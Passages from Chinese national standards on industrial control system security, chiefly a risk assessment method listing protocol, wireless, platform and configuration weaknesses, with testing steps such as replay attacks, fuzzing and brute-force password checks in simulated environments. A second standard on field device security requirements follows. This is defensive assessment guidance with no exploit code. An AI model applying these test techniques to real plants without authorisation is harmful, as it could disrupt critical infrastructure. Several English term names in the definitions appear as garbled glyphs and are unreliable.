查看重要网络设备放置场所,场所有无物理访问控制、有无禁止无关人员进入的措施,是否安 装监视系统、是否安装空调等支持设备;针对被评估方采取的措施,验证其有效性; b) 查看是否留有不安全的物理端口,是否将无用的USB 、PS/2、网络接口封堵,是否采用技术手 段对这些端口进行监控; c) 查看设备的访问日志、安全配置及网络权限,在模拟环境中对设备进行测试,通过尝试使用口 令绕过,提取权限,修改 ACL, 发现设备的脆弱性,并验证其安全措施的有效性; d) 在模拟测试环境中查看设备是否开启不必要的端口并对其进行测试; e) 在模拟仿真测试环境中查找设备存在的系统漏洞; f) 查看网络设备口令更新周期及字符长度等配置; g) 现场访谈被评估方是否为网络硬件配备专门运维人员; h) 现场访谈及核查被评估方是否对替换下的网络硬件进行登记、保存或按照要求进行销毁。 6.4.3.3 通信和无线连接脆弱性识别 通信和无线连接脆弱性是指工业控制系统网络通信和无线连接存在的脆弱性。表9列出了工业控 制系统的通信和无线连接通常可能存在的脆弱性。 通信和无线连接脆弱性: 通信协议明文传输 攻击者可以使用协议分析工具或者其他设备解析ProfiBus、DNP、Modbus、CAN 等协议传输的数据,实现对工业控制系统的网络监控。使用这些协议也可以使攻 击者更容易攻击工业控制系统或控制工业控制系统网络行为 通信协议缺少认证机制 许多工业控制系统协议不具备认证机制,采用此类型的通信协议,存在重放或篡 改数据的可能性 缺少通信完整性保护 大部分的工业控制系统协议不具备完整性检查机制。攻击者可以操纵这种没有 完整性检查的通信 无线连接客户端与接入点间认 证不足 无线客户端与接入点之间认证不足,导致客户端访问的是攻击者伪造的接入点, 同时非法入侵者可访问工业控制系统无线网络 无线连接客户端与接入点间数 据保护不力 无线客户端与接入点间传递的敏感数据未采用加密保护,攻击者监听明文信息造 成信息泄露 无线网络边界不清 无线网络的范围无法精确控制,导致非受控终端的接入 实施指南如下: a) 现场对工业控制系统控制柜及机房环境中的无线网络进行搜索,确认企业的无线组网是否采 取身份认证措施、是否需要标识和密码验证、是否采取安全监测措施,检查被评估方有无为防 止经无线网络进行恶意入侵所采取的其他措施,并分析其有效性; b) 在模拟仿真环境中对使用的通信协议进行协议分析,分析是否是明文传输; c) 在模拟仿真环境中使用重放攻击验证是否有数据校验,防篡改的措施; d) 评估方现场核查无线连接客户端与接入点间的认证方式,评估方在模拟仿真环境中采用相应 的测试方法验证其有效性; e) 评估方现场核查是否有未授权接入无线网络的设备; f) 在模拟仿真环境中使用相应的工具分析该无线协议是否明文传输。 6.4.4 平台脆弱性识别 6.4.4.1 平台脆弱性识别概述 工业控制系统平台是由工业控制系统硬件、操作系统及其应用软件组成。平台脆弱性是由工业控 制系统中软硬件本身存在的缺陷、配置不当和缺少必要的维护等问题造成。平台脆弱性包括平台硬件、 平台软件和平台配置3个方面的脆弱性。 6.4.4.2 平台硬件脆弱性识别 平台硬件脆弱性是指工业控制系统平台硬件设备存在的脆弱性。表10列出了工业控制系统的平 台硬件通常可能存在的脆弱性。 平台硬件脆弱性:开启远程服务的设备安全保护 不足 开启远程服务的设备没有配备运行维护工作人员,也没有物理监视技术手段 安全变更时未进行充分测试 更换设备时,未对其进行充分的检测 不安全的物理端口 不安全的通用接口如USB、PS/2等外部接口可能会导致设备未授权接入 无访问控制的硬件调试接口 攻击人员可利用调试工具更改设备参数,造成设备非正常运行 不安全的远程访问工业控制系 统设备 未部署安全措施,开启了调制解调器和其他远程访问措施,使维护工程师和供应 商获得远程访问系统的能力 重要设备无冗余配置 重要的设备没有备份会导致单点失败 设备中使用双网卡连接网络 使用双网卡连接到不同网络的设备,可能会导致未授权访问并造成本应逻辑隔离 的网络出现数据交互 设备未进行注册 工业控制系统中某些设备模块未进行资产登记,可能会导致存在非授权用户访问 点以及后门 设备存在后门 工业控制系统中关键设备存在后门,可能会导致非法窃取系统数据 实施指南如下: a) 查看被评估方是否为平台硬件,尤其开启远程服务的设备配备运维人员; b) 查看是否留有不安全的物理端口,是否将无用的 USB 、PS/2、远程接口、网络接口进行封堵,或 采取其他技术措施进行监控; c) 查看是否有对变更设备时的测试记录或者其他证明变更时进行过测试的证据; d) 现场核查工业控制系统中是否存在调制解调器或专业远程连接设备,是否针对这些设备部署 安全措施,并验证安全措施的有效性; e) 现场核查是否仅必要人员可以物理访问工业控制系统设备; f) 现场核查被评估方的资产清单中是否包括工业控制系统所有设备; g) 现场查看被评估方是否对重要设备进行冗余设计,并按设计部署; h) 现场查看硬件设备中是否存在使用双网卡; i) 检测关键设备是否存在后门。 6.4.4.3 平台软件脆弱性识别 平台软件脆弱性是指工业控制系统平台软件存在的脆弱性。平台软件包括工业控制系统使用的操 作系统、应用软件、防病毒软件等。在工业控制系统中,SCADA 主机、操作站、工程师站、HMI、历史数 据库、实时数据库等通常使用与 IT 行业相同的计算机、服务器以及操作系统(主要是WINDOWS 和 UNIX)。PLC、RTU、DCS 控制器以及其他数据采集设备一般使用专用的实时或嵌入式操作系统,这些 实时或嵌入式操作系统内部安全功能有限。 工业控制系统软件脆弱性:缓冲区溢出 工业控制系统软件可能存在缓冲区溢出的问题。攻击者可以利用这一点实施 攻击 缺省配置中关闭安全功能 如果关闭或者不使用产品自带的安全功能,此类安全功能将不能起到作用 拒绝服务攻击 大多数实时或嵌入式操作系统都没有拒绝访问系统资源的机制。工业控制系统 软件可能遭受DoS攻击,导致合法用户不能访问系统,或者系统操作和功能延迟 对未定义、定义不明确或“非法” 情况的错误处理 一些工业控制系统没有进行有效检测就处理可能包含格式错误或者包含非法域 值的数据包 依赖OPC 不升级系统补丁,RPC/DCOM的脆弱性可能被利用来攻击OPC 使用不安全的工业控制系统 协议 工业控制系统普遍使用的CAN、DNP3.0、Modbus、 IEC 60870-5-101、IEC 60870-5- 104和一些工业控制系统专用协议的相关信息已公开或被破译。而且这些协议中 只有很少或根本不包含安全功能 开启了不必要的服务 不必要的服务未被禁用关闭,可能会被利用 使用明文传输协议 许多工业控制系统的系统协议以明文方式传递信息,导致消息很容易被攻击者 窃听 配置和程序软件的认证和访问 控制不足 攻击者可以通过非法访问配置和程序软件破坏设备或系统 未安装入侵检测和防御软件 入侵行为会导致系统不可用,数据被截获、修改和删除,控制命令的错误执行 某些软件中存在安全后门 不法供应商为了各种目的,在提供的软件中设置后门,危害性大 通信协议脆弱性 工业控制系统采用的部分通信协议,由于设计原因存在安全脆弱性,这些协议脆 弱性可能被攻击者利用,造成系统的不可用,数据被截获、修改和删除,控制系统 执行错误的动作等 未安装防护软件 恶意代码会导致系统性能低下、系统不可用和数据被截获、修改和删除 病毒防护软件病毒库过期 病毒防护软件病毒库过期导致系统容易被新的病毒攻击 安装病毒防护软件及其病毒库 升级包前未经过仔细的测试 未经测试就安装病毒防护软件及其病毒库升级包可能会影响工业控制系统的正 常运行 操作系统存在漏洞 操作系统不升级补丁,存在已知漏洞 实施指南如下: a) 评估方查看平台中安装的操作系统版本及应用软件类型,例如:windows 操作系统、嵌入式系 统、Linux 系统、程序下载软件、数据库软件、远程控制软件等; b) 必要时在模拟仿真环境中对重要组件进行组件测试,识别其脆弱性; c) 在模拟仿真环境中查看设备开启的端口,是否开启了不必要的端口服务; d) 在模拟仿真环境中查找设备存在的系统漏洞; e) 评估方查看平台是否安装病毒防护软件,病毒防护软件是否经过测试安装,病毒库是否定期更 新,查看测试记录及病毒库更新记录; f) 现场核查系统使用 DCOM 设备是否进行端口限定,是否对 OPC 及时修补升级; g) 在模拟仿真环境中可以使用恶意代码针对OPC 进行测试,识别其脆弱性; h) 查看关键应用软件源代码,若关键应用软件为第三方供应商提供,则需与其联系,取得软件源 代码,对其进行分析研判,识别其脆弱性; i) 现场核查在远程访问控制设备时使用的专用设备及软件,在模拟仿真环境中对其进行技术检 测,识别其脆弱性; j) 现场核查并分析系统运行产生的历史数据,验证系统数据是否曾出现异常及出现异常的时间 及原因; k) 评估方查看程序下载软件固件的使用权限,下载程序是否加密认证,并验证其认证的有效性; 1) 评估方现场查看工业控制系统中使用了哪些的工控协议,其是否只用于工业控制系统控制网络中; m) 在模拟仿真环境中对使用的工业控制系统协议进行分析,是否是明文传输; n) 在模拟仿真环境中进行重放攻击,验证是否有数据校验,防篡改; o) 在模拟仿真环境中进行模糊测试,验证平台是否存在拒绝服务等安全漏洞; p) 评估方现场查看工业控制系统中重要数据存储是否进行加密或采取其他安全措施。 6.4.4.4 平台配置脆弱性识别 平台配置脆弱性是指工业控制系统平台软硬件的配置存在的脆弱性。 平台配置脆弱性:关键配置未存储或备份 没有制定和实施工业控制系统软硬件配置备份和恢复规程,对系统参数意外或者 恶意的修改可能造成系统故障或数据丢失 便携设备上存储数据且无保护 措施 敏感数据(密码,拨号号码)以明文方式存储在了移动设备上,如笔记本、PDA,一 旦这些设备丢失或者被盗,系统安全就会遭受极大威胁 缺少恰当的口令策略 没有口令策略,系统就缺少合适的口令控制,使得对系统的非法访问更容易。口 令策略是整个工业控制系统安全策略的一部分,口令策略的制定应考虑到工业控 制系统处理复杂口令的能力 未设置口令 未设置口令可能导致非法访问。口令相关的脆弱性包括: 系统登陆无口令(如果系统有用户账户); 系统启动无口令(如果系统没有用户账户); 系统待机无口令(如果工业控制系统组件一段时间内没被使用) 口令保护不当 缺少适当的密码控制措施,未授权用户可能擅自访问机密信息。例子包括: 以明文方式将口令记录在本地系统; 与个人账户使用同一的口令; 口令泄漏给第三方; 在未受保护的通信中以明文方式传输口令 访问控制不当 访问控制方法不当,可能导致工业控制系统用户具有过多或过少的权限。如采用 缺省的访问控制设置使得操作员具备了管理员特权 未安装入侵检测和防御软件 入侵行为会导致系统不可用,数据被截获、修改和删除,控制命令的错误执行 不安全的工业控制系统组件远 程访问 系统工程师或厂商在无安全控制措施的情况下,实施对工业控制系统的远程访 问,可能导致工业控制系统访问权限被非法用户获取 未配置安全审计 当系统出现安全事件后,无法及时的找到安全事件发生的时间、类型等信息 未对系统进行权限划分 被评估方未根据工作需要合理分类设置账户权限,操作员可以取得高权限的授 权,对其进行操作,造成损失 实施指南如下: a) 评估方现场核查重要配置是否备份,是否将敏感数据存储在便携设备中; b) 评估方现场核查口令是否以明文的方式存储在本地系统或便携设备中,过去是否存在泄漏口 令的事件,在模拟仿真环境中使用暴力破解等方法验证口令的可靠性; c) 查看平台硬件设备口令更新周期及字符长度等配置; d) 现场核查远程访问控制设备接入控制网络时是否需要用户验证; e) 现场核查是否对远程访问进行审计,是否生成审计记录,或者使用其他替代安全措施; f) 现场核实是否有远程访问记录,远程访问是否经过批准或认证,远程访问数据是否加密,或者 采用其他防篡改,防泄密的措施; g) 现场核查是否使用平台软硬件安装时的预设口令、空口令是否无法登录系统,账户口令是否属 于弱口令; h) 评估方查看工业控制的权限分配,是否责权分离,是否是所需的最小权限,管理员权限是否被 评估方指定管理,是否使用缺省访问控制。验证配置访问控制的有效性; i) 现场核查平台软硬件是否具有限制无效访问次数的能力,对任何用户(人、软件进程和设备)在 可配置的时间周期内连续无效访问尝试的次数是否限制为一个可配置的数目,在可配置时间 周期内未成功尝试次数超过上限时,在指定时间内是否拒绝其访问直到由最高权限者解锁; j) 检查控制系统是否提供会话锁能力,在会话不活跃状态超过可配置的时间周期之后,检查会话 锁是否启用,防止其进一步的访问,会话锁是否保持有效直到最高权限者使用适当的标识和认 证规程重新建立访问; k) 现场核查是否安装入侵检测和防御软件,或是否采用其他替代措施; 1) 现场核查可开启审计功能的软硬件是否开启相关功能,或是否采取替代措施。 6.4.5 脆弱性分析 根据脆弱性识别结果,可以根据脆弱性对资产的影响程度、利用脆弱性的难易程度、脆弱点的流行 程度等对已识别的脆弱性的严重程度进行赋值。 脆弱性是客观存在的,脆弱性赋值是由主观评判的,因此评估方应结合实际情况选取合适的脆弱性 赋值方法,例如CVSS 。由于很多脆弱点反映的是同一方面的问题,或可能造成相似的后果,赋值时应 综合考虑这些脆弱点,以确定这一方面脆弱性的严重程度。脆弱性严重程度可以进行等级化处理,不同 的等级分别代表资产脆弱性严重程度的高低。等级数值越大,脆弱性严重程度越高。如下提供了脆弱 性严重程度的一种赋值方法。 5 很高 如果被威胁利用,将对资产造成完全损害 4 高 如果被威胁利用,将对资产造成重大损害 3 中等 如果被威胁利用,将对资产造成一般损害 2 低 如果被威胁利用,将对资产造成较小损害 1 很低 如果被威胁利用,对资产造成的损害可以忽略 6.5 保障能力评估 6.5.1 保障能力评估概述 保障能力是指被评估方在工业控制系统管理、运行、人员和技术等方面提供保障措施和对策的能 力。工业控制系统的安全需求可以通过安全保障得以满足。合适的安全保障能够减少系统脆弱性、抵 御工业控制系统所面临的安全威胁,从而降低工业控制系统的安全风险;或在安全事件发生时,缓解对 被评估方的影响。 保障能力评估包括但不限于对网络安全管理、工控系统安全管理、密码使用管理、宣传教育培训、应 急响应、技术防护能力等六个方面进行充分性、合规性、有效性的评估。合规性是指与相关法律、规则和 标准的一致性;充分性是指充分覆盖被评估方的安全需求;有效性是指能保护资产、抵御威胁和减少脆弱性。 不同的工业控制系统的保障能力要求不同,本标准提供了一种通用的保障能力评估方法,评估方应 根据被评估系统的特点、行业要求等,选取更适合被评估系统的保障能力评估方法,当没有更适用的方 法时可以参考本标准进行评估。 6.5.2 网络安全管理 网络安全管理包括对制度建立及落实、责任明确及落实、人员安全管理、资产安全管理、供应链安全 管理、外包服务管理、业务连续性管理、宣传教育培训和安全经费保障等方面的要求。评估人员可以依 据 GB/T32919—2016 附 录B 中的 B.1、B.4、B.5 和 B.6 对网络安全管理进行评估。 6.5.3 系统安全管理 工控安全管理通常包括对架构安全、连接安全、组网安全、配置安全、运维安全、数据安全、应急安全 等方面的要求。评估人员可以依据 GB/T 32919—2016 中的 B.1 、B.9 和 B.10 对系统安全管理进行 评估。 6.5.4 密码使用管理 密码使用管理可以依据 GB/T 32919—2016 中的 B.18 进行评估。 6.5.5 宣传教育培训 宣传教育培训可以依据 GB/T 32919—2016 中的 B.14 进行评估。 6.5.6 应急响应 应急响应可以依据 GB/T 32919—2016 中的 B.13 进行评估。 6.5.7 技术防护能力 技术防护能力包括对物理环境安全防护、网络安全防护、网络设备安全防护、安全设备安全防护、服 务器安全防护、终端计算机安全防护、存储介质安全防护、应用系统安全防护、门户网站安全防护、电子 邮件系统安全防护、重要数据安全防护等方面的要求。评估人员可以依据GB/T 32919—2016 中的 B.7、B.11、B.12、B.16、B.17 和 B.18 进行评估。 6.5.8 保障能力分析 通过对上述保障能力的识别,综合分析出工业控制系统的保障能力水平。 如下给出了一种保障能 力的等级划分方法。 等级 标识 定义 4 低 未达到GB/T32919—2016一级基线标准或不满足系统基本安全要求 3 一般 达到GB/T 32919—2016一级基线标准或满足系统基本安全需求 2 较高 达到GB/T 32919—2016二级基线标准或满足系统大部分安全需求 1 高 达到GB/T32919—2016三级基线标准或几乎满足系统所有安全需求 6.6 风险分析 6.6.1 风险分析原理 完成了资产评估、威胁评估、脆弱性评估,保障能力评估后,将采用适当的方法与工具确定威胁利用 脆弱性导致安全事件发生的可能性。综合安全事件所作用的资产价值及脆弱性的严重程度,判断安全 事件造成的损失对被评估方的影响,即安全风险。 风险计算方法包括定性计算和定量计算,但在实际工作中定量计算方法的可操作性较差, 一般多采 用定性计算方法。无论评估方采用何种计算方法,都应对完成协议跨界的设备以及关键设备重点加权。 评估方通过风险计算,完成对风险情况的综合分析与评价。 6.6.2 风险结果判定 为实现对风险的控制与管理,可以对风险评估的结果进行等级化处理。等级化处理的方法是按照 风险值的高低进行等级划分,风险值越高,风险等级越高。风险等级一般可划分为五级。 根据风险值的分布状况,为每个等级设定风险值范围,并对所有风险计算结果进行等级处理。每个 等级代表了相应风险的严重程度。如下提供了一种风险等级划分方法。 等级 标识 描述 5 很高 一旦发生将产生非常严重的社会或经济影响,如重大生产事故、系统无法正常运行等 4 高 一旦发生将产生较大的社会或经济影响,如生产事故、在一定范围内影响系统的正常运 行等 3 中等 一旦发生会造成一定的社会或经济影响,但影响面和影响程度不大 2 低 一旦发生造成的影响程度较低, 一般仅限于被评估方内部,通过一定手段很快能解决 1 很低 一旦发生造成的影响几乎不存在,通过简单的措施就能弥补 被评估方应当综合考虑风险控制成本与风险造成的影响,提出一个可接受的风险范围。对某些资 产的风险,如果风险计算值在可接受的范围内,则该风险是可接受的风险,应保持已有的安全措施;如果 风险评估值在可接受的范围外,即风险计算值高于可接受范围的上限值,是不可接受的风险,需要采取 安全措施以降低、控制风险。另一种确定不可接受的风险的办法是根据等级化处理的结果,设定可接受 风险值的基准,达到相应等级的风险都进行处理。 6.7 残留风险控制 风险分析完成后,被评估方需判断风险是否在接受范围内。若风险是可接受的,被评估方应对残留 风险进行持续的监控。若风险不可接受,需制定风险控制措施并实施风险控制行动。在实施风险控制 行动之后,对仍然存在的不可接受安全风险应重新进行评估、控制和管理的活动。残留风险的评估流程 及内容可有针对性的适当剪裁。 风险评估报告是综合分析阶段的输出文档,是对整个风险评估过程和结果的总结。 评估方根据评估检测数据和风险计算结果,对被评估对象进行定性、定量分析,明确被评估对象面 临的威胁和主要脆弱点,提出相应的整改建议,并在此基础上编制风险评估报告。风险评估报告需要对 评估对象进行说明,并阐明采用的风险计算原理及风险评估方法。报告中应对综合分析阶段的结果给 予详细说明,主要包括资产、威胁和脆弱性的评估结果,风险对被评估方业务及系统的影响范围、影响程 度,风险统计和风险等级,残留风险控制等。评估报告发布后,若需改动或增补,只能采用补充报告的形 式,报告上应标明原报告的标题和编号,补充报告的编写要求与原报告相同。 物理环境脆弱性核查:工业控制系统是否集中在一区域、是否建立了防火、防潮、防雷击、防电磁干扰等技术保障措施、是否采用应急电源、应急照明和紧急停机等措施、是否在工业控制系统相关区域配置了门禁系统和监控系统 是否制定并维护对工业控制系统具有访问权限的人员名单、是否按被评估方定义的时间间隔对授权人员进行评审和批准、是否根据职位、角色对工业控制系统实施进行物理访问授权、是否及时从访问列表中清除那些不再访问工业控制系统的人员、是否保存物理访问记录、是否在需要对访客进行陪同和监视的环境下对访问者的行为进行 陪同和监视、是否按照被评估方定义的时间间隔更换访问控制设备的口令,在密 码泄露和人员调动或离职时更换访问控制设备的口令、设备资产是否进行了标识和统计管理、关键设备或存储介质携带出工作环境时,是否具备行为审计和内容加密措施、是否设立一个人工值守的接待区域、物理出入控制是否采用发放/佩戴身份识别标志、物理出入控制是否采用离开后收回访问权限、物理出入控制是否采用限制敏感区域访问、是否采用保护电力和通讯电缆不受侦听或者破坏、放置工业控制系统设施的区域是否有可靠的边界设施、是否采用应急设备和备份介质的存储位置与主安全区域保持一个 安全距离 网络脆弱性核查:系统网络结构是否分层设计、系统中网络边界是否清晰、系统网络边界中是否使用网络隔离设备 系统划分VLAN是否合理、网络链路是否有冗余设计、网络设备是否有容错能力、控制网络中是否部署企业级应用 控制网络中是否允许IT网络服务应用、被评估方是否限制工业控制系统系统访问的数量、网络中存在的通信协议有哪些、控制网络中是否采用专用标准的协议、通信协议是否是明文传输、通信协议是否健壮、是否使用密码产品、是否对产生的密钥进行管理、是否使用无线传输协议、无线传输是否采用加密协议、是否管制控制范围内的无线网络、通信被捕获后是否可以被解析出数据、通信协议是否有完整性校验、通信协议是否可被篡改、重放、无线客户端与接入点是否具有认证措施、是否存在远程通信、是否使用VPN进行远程通信、采用远程在线运维服务方式时,是否对远程在线运维服务的安全风险进行充分评估并采取书面审批、访问控制、在线监测、日志审计等 安全防护措施进行安全风险控制、是否使用OPC协议、系统网络中是否部署网络设备、部署的网络设备是否冗余、网络设备系统版本是否是最新版本、系统配置是否备份、是否存在无用USB接口、PS/2、现场控制组件的网络模块接口,是 否对这些无用端口进行封堵、是否按照用户分配账号、是否存在不同用户间共享账号、是否使用账号的密码策略、Password是否加密、是否存在简单口令、是否禁用远程管理员权限操作、是否禁用Telnet方式访问系统、是否使用SSH、是否限制VTY的数量、是否启用远程访问ACL控制、是否开启SNMP服务、SNMP版本、SNMP服务的共同体字符串是否为默认值、SNMP是否设置了ACL控制、是否禁用HTTP配置方式、设备是否定时账户自动退出、是否禁用不使用的端口、是否禁用AUX端口(远程配置端口)、是否开启日志功能,能否远程传输保存日志、是否有日志审计功能、是否配置了SYSLOG SYSLOG配置信息、SYSLOG能否被收集、logging的配置、是否设置安全访问控制,过滤掉已知安全攻击数据包、当前系统版本是否存在严重的安全漏洞、当前系统版本是否需要升级 平台脆弱性核查:ICS是否进行物理或逻辑分区、系统中部署工程师站、操作员站、实时数据库、历史数据库等应用的、PC和服务器中使用的操作系统是否最新版本,是否存在已知漏洞、HMI、PLC、RTU和IED等控制组件使用的是否是专用操作系统、专业操作系统是否最新版本,是否存在已知漏洞、是否开放的非必要的TCP和UDP端口、历史数据库是否使用通用数据库,是否存在已知漏洞、实时数据库是否为专用数据库,是否存在已知漏洞、组态软件是否存在已知漏洞、是否进行MAC地址绑定、是否禁止控制网络中设备接受邮件、系统中是否使用TELNET、FTP、TFTP进行文件传输、用户功能与系统管理功能是否分离、账户类型是否基于角色、设备和属性进行设立、工程师站、操作员站、控制组件等是否存在供应商设置的默认账户 口令、是否存在共享账户、是否仅授予管理用户所需的最小权限,权限分离、工业控制系统是否禁止通过共享的系统资源进行未授权的、无意的 数据传输、工业控制系统是否禁止在软件应用中自动执行移动代码、工业控制系统是否对输入信息进行验证、日志中是否出现敏感信息、是否具有审计功能、工程师站、实时数据库、控制组件是否冗余备份,是否具有容错能力、系统数据是否异地备份 系统敏感数据是否加密存储、是否在安装实时检测与查杀恶意代码的软件产品前,进行测试、服务器是否安装多系统、检查系统安装的补丁、是否开启屏幕保护程序、开启屏幕保护程序时间、屏幕保护程序是否有恢复口 令、是否有失败登录控制、是否具有会话锁定、口令复杂度要求是否开启、口令复杂度要求、最短口令长度要求是否开启 口令过期策略、账户锁定计数器、账户锁定时间、账户锁定阀值是否限制当前会话数量、是否下载控制程序时加密 是否具有防御措施防制非授权用户对设备固件进行更新和维护、固件是否加壳加密、PLC、RTU、DCS控制器是否存在硬件锁、管理员是否更改默认名称、Administrators组是否存在可疑账号、端口、进程对应信息检查、检查主机端口限制信息、查看主机磁盘分驱类型、检查特定目录的权限、审核策略成功还是失败、系统日志覆写规则是否默认、系统日志覆写规则、安全日志存储位置是否默认、安全日志存储位置、最大安全日志文件大小是否默认、最大安全日志文件大小(单位:k)、安全日志覆写规则是否默认、安全日志覆写规则、应用日志存储位置是否默认、应用日志存储位置、最大应用日志文件大小是否默认、最大应用日志文件大小(单位:k)、应用日志覆写规则是否默认、应用日志覆写规则、是否无法记录安全审计时立即关闭系统、是否对匿名连接做限制、是否自动注销用户、是否显示上次成功登录用户名、是否允许未登录关机、是否仅登录用户允许使用光盘、是否仅登录用户允许使用软盘、保护注册表,防止匿名访问、检查注册表中自动启动选项、有无指定当前主机的操作人员、有无指定当前主机的物理接触人员、有无相应的物理损害和其他故障的备份恢复策略、操作人员是否有对应的日志记录、是否安装防病毒软件、防病毒软件厂商、防病毒软件是否自动更新、防病毒软件当前版本 保障能力核查:建立并严格执行外包服务安全管理制度、与网络技术外包服务提供商签订服务合同和网络安全与保密协议,、明确网络安全与保密责任,要求服务提供商不得将服务转包,不得泄、露、扩散、转让服务过程中获知的敏感信息,不得占有服务过程中产生 的任何资产,不得以服务为由强制要求委托方购买、使用指定产品、安全管理员是否定期进行安全检查,检查内容包括系统日常运行、 系统漏洞和数据备份等情况、组织或上级单位是否定期进行全面安全检查,检查内容包括现有安 全技术措施的有效性、安全配置与安全策略的一致性、安全管理制 度的执行情况等、是否制定安全检查表格实施安全检查,汇总安全检查数据,形成安 全检查报告,并对安全检查结果进行通报、是否制定安全审核和安全检查制度规范安全审核和安全检查工作, 定期按照程序进行安全审核和安全检查活动、是否建立了工业控制系统安全事件应急管理策略、是否建立了移动存储设备的使用与管理策略、是否对系统的配置变更进行变更管理、是否建立了计算机病毒防治管理制度、是否建立了数据备份管理制度、是否形成由安全策略、管理制度、操作规程等构成的全面的信息安 全管理制度体系、是否指定或授权专门的部门或人员负责安全管理制度的制定、安全管理制度是否具有统一的格式,并进行版本控制、安全管理制度是否通过正式、有效的方式发布 是否定期或不定期对安全管理制度进行检查和审定,对存在不足或 需要改进的安全管理制度进行修订、是否对被录用人具备的专业技术水平和安全管理知识进行了岗位 符合性审查、是否对各类人员进行了安全意识和基本技能培、是否与关键岗位人员签署了保密协议、应严格规范人员离岗过程,及时终止离岗员工的所有访问权限、是否有对从事信息安全服务的第三方人员的管控措施、是否对关键岗位的人员进行全面、严格的安全审查和技能考核、是否对考核结果进行记录并保存、是否对外部人员允许访问的区域、系统、设备、信息等内容应进行书 面的规定,并按照规定执行、建立资产台账(清单),对资产进行统一分类、分级、编号、标识,及时 记录资产状态和使用情况,保证账物相符、专人负责资产的管理
standards
信息安全技术 工业控制系统现场 测控设备通用安全功能要求 Information security technology—Common security functional requirements for data acquisition and control field devices of industrial control systems 现场测控设备是工业控制系统的基本功能执行设备,直接对工业生产过程进行监视与控制,对于生 产的安全稳定运行至关重要。 随着信息通信技术在工业控制系统中的应用,现场设备的智能化程度逐渐增加,网络化和处理能力 的增加使得这些设备所面临的信息安全风险较传统现场设备面临的风险种类更多,范围更大,层次更为 深入,一旦遭受攻击,将直接导致设备所辖区域内甚至连锁性的生产事故,因此其信息安全不仅与生产 安全和经济安全密不可分,而且电力、化工、天然气等重要基础设施的现场安全水平直接关系到国计民 生、社会稳定与公众利益。 为提高现场设备的信息安全能力,本标准提出针对现场测控设备的通用安全功能要求,用于设备的 安全设计、开发、测试与评估。 使用者应根据实际或计划使用环境的安全风险分析结果,选择设备应满 足的安全功能要求。 信息安全技术 工业控制系统现场 测控设备通用安全功能要求 1 范围 本标准规定了工业控制系统现场测控设备的用户标识与鉴别、使用控制、数据完整性、数据保密性、 数据流限制、资源可用性 6类通用的安全功能要求。 本标准适用于指导设备的安全设计、开发、测试与评估。 涉及设备功能实现原理、工业控制系统整体管理和运行以及信息安全外围技术的内容不在本标准 范围之内。 例如: — 本标准不涵盖与设备自身安全功能与实现没有直接关联的行政性管理和运行安全要求,如组 织管理和人员管理等。 对于影响技术实施的口令策略和配置程序等管理措施,将包含在要求 的描述中,不作关于管理和运行内容的强调; — 本标准不涵盖与设备自身信息安全功能与实现没有直接关联的电磁辐射等物理安全方面的内 容,对于影响信息安全技术防护效果的物理安全访问控制等措施,将包含在要求的描述中,不 作关于物理安全内容的强调; — 本标准不对传统工业控制系统中机电式、液压式和气动式等不涉及信息技术实现原理的设备 的信息安全功能进行要求; — 本标准不覆盖传感器、变送器、调节器、开关/断路器等生产过程设备。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。 凡是注日期的引用文件,仅注日期的版本适用于本文 件。 凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 9387 . 2 — 1995 信息处理系统 开放系统互连 基本参考模型 第 2部分:安全体系结构 GB/T 25069 — 2010 信息安全技术 术语 GB/T 32919 — 2016 信息安全技术 工业控制系统安全控制应用指南 3 术语和定义 GB/T9387 . 2 — 1995、GB/T25069 — 2010和 GB/T32919 — 2016界定的以及下列术语和定义适用 于本文件。 3.1 工业控制系统现场测控设备 犱犪狋犪犪犮狇狌犻狊犻狋犻狅狀 犪狀犱犮狅狀狋狉狅犾犳犻犲犾犱犱犲狏犻犮犲狊狅犳犻狀犱狌狊狋狉犻犪犾犮狅狀狋狉狅犾狊狔狊狋犲犿狊 工业控制系统中,位于现场,具有以下生产相关全部或部分功能的一种独立实体设备: — 从传感器、变送器、调节器或开关等过程设备接收采集数据; — 进行逻辑与控制计算; — 向调节器或开关等过程执行设备发送控制指令。 设备与其他同类设备、系统主站或应用进行采集数据与控制指令等数字或模拟信号通信。 下列设备为典型的工业控制系统现场测控设备: — 远程终端单元(RTU,RemoteTerminalUnit); — 智能电子设备(IED,IntelligentElectricDevice); — 分散处理单元(DPU,DistributedProcessingUnit) 。 3.2 鉴别 犪狌狋犺犲狀狋犻犮犪狋犻狅狀 信息系统中,在用户、进程或设备接入资源之前,对其身份进行验证。 [NISTSP80053R3] 3.3 泛洪 犳犾狅狅犱犻狀犵 通过向计算系统或其他数据处理实体提供大于其处理能力的输入,企图引起其在信息安全方面的 故障的攻击。 [RFC2828] 4 缩略语 下列缩略语适用于本文件。 API:应用程序编程接口(ApplicationProgrammingInterface) CA:认证中心(CertificateAuthority) CRC:循环冗余校验(CyclicRedundancyCheck) DoS:拒绝服务攻击(DenyofService) DPU:分散处理单元(DistributedProcessingUnit) IED:智能电子设备(IntelligentElectricDevice) I/O:输入/输出(Input/Output) MAC:消息鉴别码(MessageAuthenticationCode) MCU:微控制单元(MicrocontrollerUnit) MMI:人机接口(ManMachineInterface) MMU:内存管理单元(MemoryManagementUnit) MPU:微处理器单元(MicroprocessorUnit) RAM:随机存取存储器(Random AccessMemory) RTOS:实时多任务操作系统(RealtimeOperatingSystem) RTU:远程终端单元(RemoteTerminalUnit) TCP:传输控制协议(TransmissionControlProtocol) UDP:用户数据报协议(UserDatagramProtocol) 5 安全功能要求描述结构 5 . 1 要求类结构 图 1以框图形式示意了要求类的结构。 每个要求类包括一个类名、类描述和一个或多个要求族。 类名提供标识和划分不同要求类所必需的信息。 每个要求类都有 一 个唯 一 的名称,类的分类信息 由三个字符的简写组成。 要求类分类信息简写说明见附录 B。 类名的简写也用于该类中族的族名规 范中。 类描述总体描述类中包含的族和该类要求的主要作用。 类描述用图来描述类中的族以及每个族中组件的层次结构。 5.2 要求族结构 图2以框图形式示意了要求族的结构。每个要求族包括一个族名、族描述和一个或多个组件。 族名提供标识和划分不同要求族所必需的信息。每个要求族都有一个唯一的名称,族的分类信息 由所属类的简写和族名三个字符的简写组成。要求族的分类信息简写说明见附录 B。 族描述总体描述族和该族要求的主要作用。 5.3 要求项结构 图3以框图形式示意了要求项的结构。每个要求项包括要求名、要求的内容、要求说明、零个或多 个要求加强子项和依赖要求。 